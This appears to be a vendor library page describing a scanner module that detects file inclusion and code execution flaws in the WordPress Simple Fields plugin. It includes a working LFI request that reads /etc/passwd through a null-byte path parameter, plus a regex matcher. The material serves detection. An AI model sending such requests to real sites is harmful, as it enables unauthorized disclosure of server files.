Vidoc logo

Module library

All modulesVisit vidocsecurity.com
Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Start for free

WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE

By kannthu

High
Vidoc logoVidoc Module
#wp-plugin#lfi#packetstorm#wordpress
Description

What is the "WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE" module?

The "WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE" module is designed to detect vulnerabilities in the WordPress Simple Fields plugin versions 0.2 to 0.3.5. This module focuses on identifying local file inclusion (LFI), remote file inclusion (RFI), and remote code execution (RCE) issues within the plugin.

This module has a high severity level, indicating that the identified vulnerabilities can potentially lead to unauthorized access, data leakage, or even complete compromise of the affected WordPress installation.

Impact

If the "WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE" module detects vulnerabilities in the targeted WordPress Simple Fields plugin, it means that an attacker could exploit these vulnerabilities to gain unauthorized access to sensitive files, execute arbitrary code, or include malicious files from remote servers. This can result in a variety of security risks, including data breaches, website defacement, or even complete control of the affected WordPress site.

How does the module work?

The "WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE" module works by sending specific HTTP requests to the targeted WordPress installation with the Simple Fields plugin. These requests are designed to exploit the identified vulnerabilities and trigger the desired behavior, such as file inclusion or code execution.

For example, one of the HTTP requests used by this module is:

GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00

This request attempts to include the "/etc/passwd" file, which is a common target for LFI attacks, by manipulating the "wp_abspath" parameter.

The module also includes matching conditions to verify if the exploitation was successful. In this case, it checks the response body for the presence of the "root" user entry in the "/etc/passwd" file, indicating a successful LFI attack.

By combining these HTTP requests and matching conditions, the module can effectively identify vulnerabilities in the WordPress Simple Fields plugin and provide actionable information for remediation.

For more information about this vulnerability, you can refer to the Packet Storm Security reference.

Module preview

Concurrent Requests (1)
1. HTTP Request template
GET/wp-content/plugins/...
Matching conditions
regex: root:.*:0:0:
Passive global matcher
No matching conditions.
On match action
Report vulnerability